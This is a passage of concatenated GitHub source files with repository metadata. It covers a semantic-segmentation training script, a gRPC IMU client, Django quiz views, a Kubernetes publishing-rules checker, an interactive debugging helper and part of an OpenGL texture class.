Image.fromarray(image).save('results/%d_image.png' % img_id)\n Image.fromarray(target).save('results/%d_target.png' % img_id)\n Image.fromarray(pred).save('results/%d_pred.png' % img_id)\n\n fig = plt.figure()\n plt.imshow(image)\n plt.axis('off')\n plt.imshow(pred, alpha=0.7)\n ax = plt.gca()\n ax.xaxis.set_major_locator(matplotlib.ticker.NullLocator())\n ax.yaxis.set_major_locator(matplotlib.ticker.NullLocator())\n plt.savefig('results/%d_overlay.png' % img_id, bbox_inches='tight', pad_inches=0)\n plt.close()\n img_id += 1\n\n score = metrics.get_results()\n return score\n\n\ndef main():\n opts = get_argparser().parse_args()\n\n os.environ['CUDA_VISIBLE_DEVICES'] = opts.gpu_ids\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n opts.device = device\n print(\"Device: %s\" % device)\n\n # Setup random seed\n torch.manual_seed(opts.random_seed)\n np.random.seed(opts.random_seed)\n random.seed(opts.random_seed)\n\n # Setup dataloader\n train_dst, val_dst = get_dataset(opts)\n train_loader = data.DataLoader(\n train_dst, batch_size=opts.batch_size, shuffle=True, num_workers=2)\n val_loader = data.DataLoader(\n val_dst, batch_size=opts.val_batch_size, shuffle=False, num_workers=2)\n print(\"Dataset: %s, Train set: %d, Val set: %d\" %\n (opts.dataset, len(train_dst), len(val_dst)))\n\n # Set up model\n model = network.model_map[opts.model](num_classes=opts.num_classes, output_stride=opts.output_stride,\n pretrained_backbone=True)\n if opts.separable_conv and 'plus' in opts.model:\n network.convert_to_separable_conv(model.classifier)\n utils.set_bn_momentum(model.backbone, momentum=0.01)\n\n # Set up metrics\n metrics = StreamSegMetrics(opts.num_classes)\n\n # Set up optimizer\n optimizer = torch.optim.SGD(params=[\n {'params': model.backbone.parameters(), 'lr': 0.1 * opts.lr},\n {'params': model.classifier.parameters(), 'lr': opts.lr},\n ], lr=opts.lr, momentum=0.9, weight_decay=opts.weight_decay)\n # optimizer = torch.optim.SGD(params=model.parameters(), lr=opts.lr, momentum=0.9, weight_decay=opts.weight_decay)\n # torch.optim.lr_scheduler.StepLR(optimizer, step_size=opts.lr_decay_step, gamma=opts.lr_decay_factor)\n if opts.lr_policy == 'poly':\n scheduler = utils.PolyLR(optimizer, opts.total_itrs, power=0.9)\n elif opts.lr_policy == 'step':\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=opts.step_size, gamma=0.1)\n\n criterion = Loss(opts)\n\n def save_ckpt(path):\n \"\"\" save current model\n \"\"\"\n torch.save({\n \"cur_epochs\": cur_epochs,\n \"cur_itrs\": cur_itrs,\n \"model_state\": model.module.state_dict(),\n \"optimizer_state\": optimizer.state_dict(),\n \"scheduler_state\": scheduler.state_dict(),\n \"best_score\": best_score,\n }, path)\n print(\"Model saved as %s\" % path)\n\n utils.mkdir('checkpoints')\n # Restore\n best_score = 0.0\n cur_itrs = 0\n cur_epochs = 0\n if opts.ckpt is not None and os.path.isfile(opts.ckpt):\n checkpoint = torch.load(opts.ckpt, map_location=torch.device('cpu'))\n model.load_state_dict(checkpoint[\"model_state\"])\n model = nn.DataParallel(model)\n model.to(device)\n if opts.continue_training:\n optimizer.load_state_dict(checkpoint[\"optimizer_state\"])\n scheduler.load_state_dict(checkpoint[\"scheduler_state\"])\n cur_epochs = checkpoint[\"cur_epochs\"]\n cur_itrs = checkpoint[\"cur_itrs\"]\n best_score = checkpoint['best_score']\n print(\"Training state restored from %s\" % opts.ckpt)\n print(\"Model restored from %s\" % opts.ckpt)\n del checkpoint # free memory\n else:\n print(\"[!] Retrain\")\n model = nn.DataParallel(model)\n model.to(device)\n\n # ========== Train Loop ==========#\n if opts.test_only:\n model.eval()\n val_score = validate(\n opts=opts, model=model, loader=val_loader, device=device, metrics=metrics)\n print(metrics.to_str(val_score))\n return\n\n interval_loss = 0\n while True: # cur_itrs < opts.total_itrs:\n # ===== Train =====\n criterion.start_log()\n model.train()\n cur_epochs += 1\n for (images, labels) in train_loader:\n cur_itrs += 1\n\n # images = images.to(device, dtype=torch.float32)\n # labels = labels.to(device, dtype=torch.long)\n images, labels = get_input(images, labels, opts, device, cur_itrs)\n\n optimizer.zero_grad()\n outputs = model(images)\n\n # loss = criterion(outputs, labels)\n loss = calc_loss(criterion, outputs, labels, opts)\n loss.backward()\n optimizer.step()\n\n np_loss = loss.detach().cpu().numpy()\n interval_loss += np_loss\n\n print(f\"\\rEpoch {cur_epochs}, Itrs {cur_itrs}/{opts.total_itrs}, Loss={np_loss}\", end='')\n\n if (cur_itrs) % 10 == 0:\n interval_loss = interval_loss / 10\n print(f\"\\rEpoch {cur_epochs}, Itrs {cur_itrs}/{opts.total_itrs}, Loss={interval_loss}\")\n interval_loss = 0.0\n\n if (cur_itrs) % opts.save_interval == 0 and (cur_itrs) % opts.val_interval != 0:\n save_ckpt('checkpoints/latest_%s_%s_os%d.pth' %\n (opts.model, opts.dataset, opts.output_stride))\n\n if (cur_itrs) % opts.val_interval == 0:\n save_ckpt('checkpoints/latest_%s_%s_os%d.pth' %\n (opts.model, opts.dataset, opts.output_stride))\n print(\"validation...\")\n model.eval()\n val_score = validate(opts=opts, model=model, loader=val_loader, device=device,\n metrics=metrics)\n print(metrics.to_str(val_score))\n if val_score['Mean IoU'] > best_score: # save best model\n best_score = val_score['Mean IoU']\n save_ckpt('checkpoints/best_%s_%s_os%d.pth' %\n (opts.model, opts.dataset, opts.output_stride))\n model.train()\n scheduler.step()\n\n if cur_itrs >= opts.total_itrs:\n return\n criterion.end_log(len(train_loader))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kk1990kk/SemanticSegmentation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"2395856862","text":"\"\"\"\nAn example gRPC Client for the IMU Service\n\"\"\"\n\nimport logging\nimport time\n\nimport grpc\nimport imu_pb2\nimport imu_pb2_grpc\n\n\ndef get_status(stub):\n status = stub.GetStatus(imu_pb2.EmptyRequest())\n print(\n \"\"\"======== Status ===========\nis_updating: %s\nhas_position: %s\nposition_stable %s\nis_mag_calibrating %s\nmag_calibrated %s\nmpu_calibrated %s\"\"\"\n % (\n status.is_updating,\n status.has_position,\n status.position_stable,\n status.is_mag_calibrating,\n status.mag_calibrated,\n status.mpu_calibrated,\n )\n )\n return status\n\n\ndef get_position(stub):\n position = stub.GetPosition(imu_pb2.EmptyRequest())\n print(\n \"\"\"======== Position ========\nroll_raw: %s\npitch_raw: %s\nyaw_raw: %s\nroll_filtered: %s\npitch_filtered: %s\nyaw_filtered: %s\nroll_smoothed: %s\npitch_smoothed: %s\nyaw_smoothed: %s\"\"\"\n % (\n position.roll_raw,\n position.pitch_raw,\n position.yaw_raw,\n position.roll_filtered,\n position.pitch_filtered,\n position.yaw_filtered,\n position.roll_smoothed,\n position.pitch_smoothed,\n position.yaw_smoothed,\n )\n )\n return position\n\n\ndef start_updating(stub):\n stub.StartUpdating(imu_pb2.EmptyRequest())\n\n\ndef stop_updating(stub):\n stub.StopUpdating(imu_pb2.EmptyRequest())\n\n\ndef run():\n with grpc.insecure_channel(\"localhost:50052\") as channel:\n stub = imu_pb2_grpc.ImuServiceStub(channel)\n print(\"-------------- GetStatus --------------\")\n status = get_status(stub)\n print(repr(status))\n\n if not status.mpu_calibrated:\n stub.CalibrateMPU(imu_pb2.EmptyRequest())\n stub.Configure(imu_pb2.EmptyRequest())\n\n if not status.is_updating and not status.has_position:\n print(\"-------------- StartUpdating --------------\")\n start_updating(stub)\n\n status = get_status(stub)\n\n print(\"-------------- GetPosition --------------\")\n while True:\n get_position(stub)\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig()\n run()\n","repo_name":"se1exin/auto-telescope","sub_path":"services/imu/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23220021198","text":"from array import array\nfrom django.http.response import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nfrom .models import quiz\n\n# Create your views here.\ndef create(request):\n question = request.POST['question']\n type = 'radio'\n point = int(request.POST['point'])\n Rightanswer = request.POST['an_correct']\n data = quiz.objects.create(question=question,type=type,answer=[request.POST['an1'],request.POST['an2'],request.POST['an3']],point=point,Rightanswer=Rightanswer)\n data.save()\n return JsonResponse({'id':data.id})\n\n \ndef edit(request):\n if not 'question' in request.POST:\n return HttpResponse('not found question')\n elif not 'type' in request.POST:\n return HttpResponse('not found type')\n elif not 'answer' in request.POST:\n return HttpResponse('not found answer')\n elif not 'point' in request.POST:\n return HttpResponse('not found point')\n elif not 'Rightanswer' in request.POST:\n return HttpResponse('not found right answer')\n elif not 'id' in request.POST:\n return HttpResponse('not found id')\n else:\n question = request.POST['question']\n type = request.POST['type']\n answer = request.POST['answer']\n point = int(request.POST['point'])\n Rightanswer = request.POST['Rightanswer']\n id = request.POST['id']\n quiz.objects.filter(id=id).update(question=question,type=type,answer=[answer],point=point,Rightanswer=Rightanswer)\n return HttpResponse('updated', status=200)\ndef delete(request,id):\n quiz.objects.filter(id=id).delete()\n return HttpResponse('deleted', status=200)\ndef getDetail(request):\n if not 'id' in request.POST:\n return HttpResponse('id not found', status='400')\n else:\n id = request.POST['id']\n data_lesson = quiz.objects.filter(id=id).values()\n return JsonResponse({\"theQuiz\": list(data_lesson)})\ndef getOnly(request,id):\n data = quiz.objects.filter(id=id).values()\n return JsonResponse({'quiz':list(data)})","repo_name":"vanluan4440/django","sub_path":"App/quiz/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"32106422838","text":"import pandas as pd\r\nimport numpy as np\r\n\r\ndf = pd.read_csv('1983.csv')\r\n\r\ng = df.groupby('tourney_id')\r\n\r\ndf2 = pd.read_csv('tournament.csv')\r\n\r\nfor index, row in df2.iterrows():\r\n tournament = g.get_group(row['Tournament'])\r\n\r\n winner_ranking = tournament[['winner_age']]\r\n loser_ranking = tournament[['loser_age']] \r\n\r\n #collect all rankings\r\n allranking = np.concatenate((winner_ranking, loser_ranking))\r\n allranking = np.unique(allranking)\r\n\r\n #sum first 20 ranked players of the draw\r\n drawdiff = [sum(allranking[0:20])]\r\n print(drawdiff)","repo_name":"Tennismylife/GOAT-Theory","sub_path":"DrawDiff/DrawDifficultyCalc.py","file_name":"DrawDifficultyCalc.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"35852874426","text":"import fnmatch\nimport os\nimport sys\nimport json\n\n\ndef get_gomod_dependencies(rootdir, components):\n all_dependencies = {}\n for component in components:\n with open(os.path.join(rootdir, component, \"go.mod\")) as f:\n print((component + \" dependencies\"))\n all_dependencies[component] = []\n lines = list(set(f))\n lines.sort()\n for line in lines:\n for dep in components:\n if dep == component:\n continue\n if (\"k8s.io/\" + dep + \" =>\") not in line:\n continue\n print((\"\\t\"+dep))\n if dep not in all_dependencies[component]:\n all_dependencies[component].append(dep)\n return all_dependencies\n\n\ndef get_rules_dependencies(rules_file):\n import yaml\n with open(rules_file) as f:\n data = yaml.safe_load(f)\n return data\n\n\ndef main():\n rootdir = os.path.dirname(__file__) + \"/../\"\n rootdir = os.path.abspath(rootdir)\n\n components = []\n for component in os.listdir(rootdir + '/staging/src/k8s.io/'):\n components.append(component)\n components.sort()\n\n rules_file = \"/staging/publishing/rules.yaml\"\n try:\n import yaml\n except ImportError:\n print((\"Please install missing pyyaml module and re-run %s\" % sys.argv[0]))\n sys.exit(1)\n rules_dependencies = get_rules_dependencies(rootdir + rules_file)\n\n gomod_dependencies = get_gomod_dependencies(rootdir + '/staging/src/k8s.io/', components)\n\n processed_repos = []\n for rule in rules_dependencies[\"rules\"]:\n branch = rule[\"branches\"][0]\n\n # If this no longer exists in master\n if rule[\"destination\"] not in gomod_dependencies:\n # Make sure we don't include a rule to publish it from master\n for branch in rule[\"branches\"]:\n if branch[\"name\"] == \"master\":\n raise Exception(\"cannot find master branch for destination %s\" % rule[\"destination\"])\n # And skip validation of publishing rules for it\n continue\n\n for item in rule[\"branches\"]:\n if \"dir\" in item[\"source\"]:\n raise Exception(\"use of deprecated `dir` field in rules for `%s`\" % (rule[\"destination\"]))\n if len(item[\"source\"][\"dirs\"]) > 1:\n raise Exception(\"cannot have more than one directory (`%s`) per source branch `%s` of `%s`\" %\n (item[\"source\"][\"dirs\"], item[\"source\"][\"branch\"], rule[\"destination\"])\n )\n if not item[\"source\"][\"dirs\"][0].endswith(rule[\"destination\"]):\n raise Exception(\"copy/paste error `%s` refers to `%s`\" % (rule[\"destination\"],item[\"source\"][\"dir\"]))\n\n if branch[\"name\"] != \"master\":\n raise Exception(\"cannot find master branch for destination %s\" % rule[\"destination\"])\n if branch[\"source\"][\"branch\"] != \"master\":\n raise Exception(\"cannot find master source branch for destination %s\" % rule[\"destination\"])\n\n # we specify the go version for all master branches through `default-go-version`\n # so ensure we don't specify explicit go version for master branch in rules\n if \"go\" in branch:\n raise Exception(\"go version must not be specified for master branch for destination %s\" % rule[\"destination\"])\n\n print((\"processing : %s\" % rule[\"destination\"]))\n if rule[\"destination\"] not in gomod_dependencies:\n raise Exception(\"missing go.mod for %s\" % rule[\"destination\"])\n processed_repos.append(rule[\"destination\"])\n processed_deps = []\n for dep in set(gomod_dependencies[rule[\"destination\"]]):\n found = False\n if \"dependencies\" in branch:\n for dep2 in branch[\"dependencies\"]:\n processed_deps.append(dep2[\"repository\"])\n if dep2[\"branch\"] != \"master\":\n raise Exception(\"Looking for master branch and found : %s for destination\", dep2,\n rule[\"destination\"])\n if dep2[\"repository\"] == dep:\n found = True\n else:\n raise Exception(\n \"Please add %s as dependencies under destination %s in %s\" % (gomod_dependencies[rule[\"destination\"]], rule[\"destination\"], rules_file))\n if not found:\n raise Exception(\"Please add %s as a dependency under destination %s in %s\" % (dep, rule[\"destination\"], rules_file))\n else:\n print((\" found dependency %s\" % dep))\n extraDeps = set(processed_deps) - set(gomod_dependencies[rule[\"destination\"]])\n if len(extraDeps) > 0:\n raise Exception(\"extra dependencies in rules for %s: %s\" % (rule[\"destination\"], ','.join(str(s) for s in extraDeps)))\n items = set(gomod_dependencies.keys()) - set(processed_repos)\n if len(items) > 0:\n raise Exception(\"missing rules for %s\" % ','.join(str(s) for s in items))\n print(\"Done.\")\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"kubernetes/kubernetes","sub_path":"hack/verify-publishing-bot.py","file_name":"verify-publishing-bot.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","stars":103227,"dataset":"github-code","pt":"2"} +{"seq_id":"34766375534","text":"import matplotlib.pyplot as plt\nimport tifffile as tiff\nimport cv2\nimport pandas as pd\nimport os\nimport numpy as np\nfrom stainnet import StainNet\nimport torch\nimport staintools\n\ndef read_tiff(image_file, mode='rgb'):\n\timage = tiff.imread(image_file)\n\timage = image.squeeze()\n\tif image.shape[0] == 3:\n\t\timage = image.transpose(1, 2, 0)\n\tif mode=='bgr':\n\t\timage = image[:,:,::-1]\n\timage = np.ascontiguousarray(image)\n\treturn image\n\ndef enc2mask(mask_rle, shape):\n img = np.zeros(shape[0]*shape[1], dtype=np.uint8)\n s = mask_rle.split()\n starts, lengths = [np.asarray(x, dtype=int) for x in (s[0::2], s[1::2])]\n starts -= 1\n ends = starts + lengths\n for lo, hi in zip(starts, ends):\n img[lo:hi] = 1\n return img.reshape(shape).T\n\ndef norm(image):\n image = np.array(image).astype(np.float32)\n image = image.transpose((2, 0, 1))\n image = ((image / 255) - 0.5) / 0.5\n image=image[np.newaxis, ...]\n image=torch.from_numpy(image)\n return image\n\ndef un_norm(image):\n image = image.cpu().detach().numpy()[0]\n image = ((image * 0.5 + 0.5) * 255).astype(np.uint8).transpose((1,2,0))\n return image\n\ntrain_df = pd.read_csv('/home/r10user9/Documents/hhb/dataset/train.csv')\n\nimage_dir = '/home/r10user9/Documents/hhb/dataset/train_images'\n\nlist = train_df[train_df['organ'] == 'kidney'].id.values\n# list = [10044, 10912, 10971, 13942, 16609, 20247, 23640, 29213, 4944, 6390, 7397, 7902]\n# for i in range(len(lung_list)):\nfor i in range(10):\n image_id = list[i]\n\n source = os.path.join(image_dir, str(image_id) + '.tiff')\n target = os.path.join('/home/r10user9/Documents/hhb/dataset/test_images/10078.tiff')\n source = read_tiff(source, 'rgb')\n # target = read_tiff(target, 'rgb')\n # image = source.astype(np.float32)/255\n\n # normalizer = staintools.ReinhardColorNormalizer()\n # normalizer = staintools.StainNormalizer(method='vahadane')\n # normalizer.fit(target)\n # transform_image = normalizer.transform(source)\n\n\n # stainnet = StainNet().cuda()\n # stainnet.load_state_dict(torch.load('/home/r10user9/Documents/hhb/coatnet_baseline/pretrain_model/StainNet-3x0_best_psnr_layer3_ch32.pth'))\n\n # transform_image = un_norm(stainnet(norm(source).cuda()))\n # fft_image = np.abs(np.fft.fft2(image))\n\n d = train_df[train_df['id'] == image_id]\n rle = d.rle.item()\n mask = enc2mask(rle,(source.shape[1],source.shape[0])) if rle is not None else None\n print(image_id)\n plt.figure(figsize=(10, 10))\n plt.subplot(1, 3, 1); plt.imshow(source); plt.axis('OFF'); plt.title('image')\n # plt.subplot(1, 3, 2); plt.imshow(target); plt.axis('OFF'); plt.title('mask')\n plt.subplot(1, 3, 2); plt.imshow(source); plt.imshow(mask*255, alpha=0.4); plt.axis('OFF'); plt.title('overlay')\n # plt.subplot(1, 3, 3); plt.imshow(transform_image); plt.axis('OFF'); plt.title('mask')\n\n plt.show()","repo_name":"rockyy97/4th-solution-for-kaggle-Hacking-the-Human-Body-competition","sub_path":"eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":2872,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"21375687174","text":"from setuptools import setup\n\nversion = '0.4'\n\nsetup(\n name='WSGIRouter',\n version=version,\n description=('Tiny library for WebOb to manage URL and Request '\n 'routing correctly without many dependencies'),\n keywords='wsgi request web http',\n author='Samuel Alba',\n author_email='sam.alba@gmail.com',\n url='https://github.com/samalba/wsgirouter',\n license='MIT',\n packages=['wsgirouter'],\n package_dir={'wsgirouter': '.'},\n install_requires=['webob >= 1.1.1'],\n zip_safe=True\n )\n","repo_name":"samalba/wsgirouter","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"2094991298","text":"from pprint import pprint\nimport inspect\nimport traceback\nimport sys\nimport os\nif os.name != \"nt\":\n import readline\n\n\ndef debugger(locals_, globals_, multi_lines=False, input_history=True,\n safe_word=\"continue\"):\n \"\"\"\n Summary line.\n\n Extended description of function.\n\n Parameters\n ----------\n locals : set\n The set of local variables at the state where you want to debug\n globals : set\n The set of global variables at the state you want to debug\n multi_lines: boolean\n If this is enabled you will be able to write multi-lines code.\n Works better for writting functions(Default false)\n input_history: boolean\n Wheter you want it or not to be able to use previews\n commands with up arrow(Default true)\n safe_word: string\n The string that is used to pass the debugger and\n continue with the program flow\n Returns\n -------\n None\n It does not return\n \"\"\"\n locals_.update({\"EXCEPTION\": \"No exception yet\"})\n __input_history(input_history)\n\n input_func = __get_input_func(multi_lines)\n\n print(\"\\nSTARTING DEBUG\")\n while True:\n if(not multi_lines):\n cmd = input_func(\"DEBUG: \")\n else: \n cmd = input_func()\n if(cmd):\n cmd = ''.join(cmd)[:-1]\n\n if (cmd == safe_word):\n break\n __exec_command(cmd, globals_, locals_, safe_word)\n\n print(\"QUITTING DEBUG\")\n\n\ndef __exec_command(cmd, globals_, locals_, safe_word):\n try:\n if cmd == \"globals\":\n for t in __iter_stack():\n pprint(t[0].f_globals)\n if cmd == \"locals\":\n for t in __iter_stack():\n pprint(t[0].f_locals)\n else:\n exec(cmd, globals_, locals_)\n except Exception as e:\n print(\"SOMETHING WENT WRONG\")\n print(traceback.format_exc())\n locals_.update({\"EXCEPTION\": e})\n\ndef __iter_stack():\n for t in inspect.trace():\n l = t[0].f_locals\n if \"self\" in l.keys():\n c = l['self'].__class__.__name__\n else:\n c = \"None\"\n print(f\"FILE: {t.filename}\\tCLASS: {c}\\tFUNC: {t.function}\")\n yield t\n print(\"----------------\")\n\ndef __get_input_func(multi_lines):\n if (multi_lines):\n return sys.stdin.readlines\n return input\n\n\ndef __input_history(input_history):\n if input_history and os.name != \"nt\":\n readline.set_auto_history(True)\n","repo_name":"joseims/InsideOutDebugger","sub_path":"debugger.py","file_name":"debugger.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"15509515484","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 25 13:57:24 2022\n\n@author: eyu\n\"\"\"\n\nfrom abstractDynamics.Simulation import Simulation\nfrom SpringDynamics import SpringDynamics, SpringlessDynamics\nfrom hpuDynamics.FlowProvider import FlowSignalFromFile, ConstantFlowSignal\nfrom plotting.DefaultOutputPlotter import DefaultOutputPlotter\nfrom hpuDynamics.NameToHeaderMap import NameToHeaderMap\nimport scipy.signal\n\nfrom pyqtgraph.Qt import QtGui, QtCore\n\nfilename = \"./data/forward1.csv\"\nnameToHeaderMap = NameToHeaderMap.realMap\ndt = 0.001\n\nparameters = {\"springConstant\" : 500, #N/m\n \"motorRadius\" : 0.01, #m\n \"I\" : 6,\n \"motorTorqueConstant\" : 0.3286,\n \"motorDamping\" : 0.01,\n \"motorInductance\" : 0.0331, #0.001040\n \"motorResistance\" : 0.033,\n \"motorInertia\" : 1, #kgm^4,\n \"dt\" : dt,\n \"inputScaling\" : 100\n }\n\nflowProvider = FlowSignalFromFile(filename, nameToHeaderMap, samplingDt=0.001)\n# flowProvider = ConstantFlowSignal(1)\n\nspringDynamics = SpringDynamics(parameters)\nspringSimulation = Simulation(springDynamics, flowProvider)\n\nspringlessDynamics = SpringlessDynamics(parameters)\nspringlessSimulation = Simulation(springlessDynamics, flowProvider)\n\n\ninitialStateSpringed = {\"x\" : 0,\n \"V_m\" : 0}\n\ninitialStateSpringless = {}\n\nmaxTime = 5\n# maxTime = flowProvider.getMaxTime()\ntimeHistorySpring, outputHistorySpring = springSimulation.simulate(initialStateSpringed, dt, maxTime)\ntimeHistorySpringless, outputHistorySpringless = springlessSimulation.simulate(initialStateSpringless, dt, maxTime)\n\ndef printOutputsAtIndex(i, outputHistory):\n print(i)\n for key in outputHistory.keys():\n print(key + \": \" + str(outputHistory[key][i]))\n \ndef filterOutputs(outputHistory, dt):\n bfilt = scipy.signal.butter(1, 1/dt/10, btype='low', analog=False, fs=1/dt, output='sos')\n filteredOutputs = {}\n for key in outputHistory.keys():\n filteredOutputs[key] = scipy.signal.sosfilt(bfilt, outputHistory[key])\n return filteredOutputs\n\n# filteredOutputs = filterOutputs(outputHistory, dt)\n# plotter = DefaultOutputPlotter(\"unt\", timeHistory, outputHistory, dynamics.getParameterProperties())\nplotter1 = DefaultOutputPlotter(\"Spring\", timeHistorySpring, outputHistorySpring, springDynamics.getParameterProperties())\nplotter2 = DefaultOutputPlotter(\"Springless\", timeHistorySpringless, outputHistorySpringless, springlessDynamics.getParameterProperties())\n\nprint(outputHistorySpringless[\"T_m\"] )\nif __name__ == '__main__':\n import sys\n plotter1.plot()\n plotter2.plot()\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n QtGui.QApplication.instance().exec_()","repo_name":"eeyu/HPU-Accumulator","sub_path":"deprecated/ExecuteSpringMotorSimulation.py","file_name":"ExecuteSpringMotorSimulation.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31380668817","text":"# https://www.codewars.com/kata/552c028c030765286c00007d\n\ndef iq_test(numbers):\n is_even = None\n even, odd = None, None\n ns = [int(n) for n in numbers.split(' ')]\n for i, n in enumerate(ns, 1):\n if n % 2 == 0:\n if is_even == True:\n return i\n if even is not None:\n if odd is not None:\n return odd[0]\n is_even = False\n even = (i, n)\n else:\n if is_even == False:\n return i\n if odd is not None:\n if even is not None:\n return even[0]\n is_even = True\n odd = (i, n)\n raise ValueError('could not determine the odd one out')\n","repo_name":"vonas/challenges","sub_path":"codewars/6-kyu/iq-test.py","file_name":"iq-test.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22729429851","text":"from difflib import SequenceMatcher\n\ndef select_photo_from_options(all_photos, photo_name):\n similar_scores = []\n for photo_result in all_photos:\n result_name = photo_result.accessible_name\n similar_name_ratio = SequenceMatcher(None, result_name, photo_name).ratio()\n similar_scores.append(similar_name_ratio)\n\n photo_index = similar_scores.index(max(similar_scores)) + 1\n if len(all_photos) > 1:\n print(\"Found \" + str(len(all_photos)) + \" photos. Selecting photo \" + str(photo_index) + \". Similarity scores: \" + str(similar_scores))\n return True, photo_index\n","repo_name":"TPN-Labs/Wordpress-Portofolio-Uploader","sub_path":"modal.py","file_name":"modal.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"29583565815","text":"from collections import deque\ndef solution(A, B):\n answer = -1\n A=deque(A)\n B=deque(B)\n for i in range(0,len(A)):\n if A==B:\n answer = i\n break\n A.appendleft(A.pop())\n \n return answer","repo_name":"jeonbar2/Coding_Test","sub_path":"프로그래머스/lv0/120921. 문자열 밀기/문자열 밀기.py","file_name":"문자열 밀기.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19295405256","text":"from extern.testGL.common import constants\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom extern.testGL.zAPI.zRenderer import zBaseClass, zOpenGLTexture\nfrom extern.testGL.zAPI.zDrawing import zRectangle3D\nfrom extern.testGL.zAPI.zDrawing.zPoint3D import Point3D\nfrom Image import *\n\nclass OpenGLSurface(zBaseClass.SurfaceBase):\n \n def __init__(self,ApplyCoordinateTrans=True):\n \n self._GLposX, self._GLposY, self._GLposZ = (0,0,0)\n self._GLwidth, self._GLheight, self._GLdeep = (0,0,0)\n \n zBaseClass.SurfaceBase.__init__(self)\n self._TextureOrder = 0\n self._screenwidth, self._screenheight = constants.GetWindowSize()\n self._ApplyCoordinateTrans = ApplyCoordinateTrans\n self._renderer = None\n self._texture = zOpenGLTexture.OpenGLTexture()\n \n def SetBackgroundImageFromFile(self, FileName, UseAlpha=False):\n zBaseClass.SurfaceBase.SetBackgroundImageFromFile(self, FileName, UseAlpha=False)\n \n if FileName != None: \n _BackgroundImage = open(FileName)\n #Alpha is allowed only for png images\n s = len(FileName)\n ext = FileName[s-3:s]\n if ext not in ('PNG','png'): UseAlpha=False\n \n if UseAlpha == True:\n _format = GL_RGBA\n _ImageBuffer = _BackgroundImage.tostring(\"raw\", \"RGBA\", 0, -1)\n else:\n _format = GL_RGB\n _ImageBuffer = _BackgroundImage.tostring(\"raw\", \"RGB\", 0, -1)\n\n self.set_texture_buffer(_BackgroundImage.size[0], _BackgroundImage.size[1], _format, _ImageBuffer)\n\n\n def set_texture_buffer(self,width, height, _format, _buffer):\n if self._texture.is_init() == True and \\\n\t\t( self._texture.get_size() != (width, height) or self._texture.GetFormat() != _format):\n self._texture = zOpenGLTexture.OpenGLTexture() \n \n if self._texture.is_init() == False:\n\n self._texture.init_texture(width, height, _format, None)\n\n self._texture.set_buffer(_buffer)\n \n def SetBackgroundImageFromBuffer(self, _buffer, width, height, UseAlpha=False):\n\n if UseAlpha == True:\n _format = GL_RGBA\n else:\n _format = GL_RGB\n self.set_texture_buffer(width, height, _format, _buffer)\n \n def SetTextureOrder(self, order):\n if order == 1 or order == 0:\n self._TextureOrder = order\n \n def _SetTextureID(self, textureid):\n #print \"set textureid to \" + str(textureid) + \" on \" + str(self)\n self._TextureID = textureid\n \n def Render(self):\n glPushMatrix()\n \n glTranslatef(self._GLposX, self._GLposY, self._GLposZ)\r glScalef(self._GLwidth, -self._GLheight, self._GLdeep)\n #FIXME cache result.\n r,g,b,a = self.GetBackColorWithAlpha()\n glColorf(r/255.0, g/255.0, b/255.0, a/255.0)\n \n (_XTextureRatio, _YTextureRatio) = (1.0, 1.0) \n if self._texture != None:\n self._texture.set_texture()\n (_XTextureRatio, _YTextureRatio) = self._texture.get_memory_ratio_used()\n if self._texture.get_flip_buffer() == False:\n self._TextureOrder = 0\n else:\n self._TextureOrder = 1\n\n XTextureOffsetPercent = 0.0\n YTextureOffsetPercent = 0.0\n _YAspectRatioOffset = 0.0\n _XAspectRatioOffset = 0.0\n \n XTextureOffset = -XTextureOffsetPercent * _XTextureRatio / 100.0\r\n YTextureOffset = -YTextureOffsetPercent * _YTextureRatio / 100.0 \n \n #FIXME : move this calcul in texture class and do it only one time\n if self._texture.get_apply_aspect_ratio()==True:\n _aspect_ratio = self._texture.get_aspect_ratio()\n #print \">%s for %s x %s , r= %s\"%(_aspect_ratio, self._GLheight, self._GLwidth , self._GLheight / float(_aspect_ratio))\n if _aspect_ratio!= None:\n _good_height = self._GLwidth / float(_aspect_ratio)\n if _good_height <= self._GLheight:\n _YAspectRatioOffset = (_YTextureRatio * abs(self._GLheight)) / float(_good_height) - _YTextureRatio\n _GLpixel_YTextureOffset = (abs(self._GLheight) - _good_height) / float(2)\n YTextureOffset -= 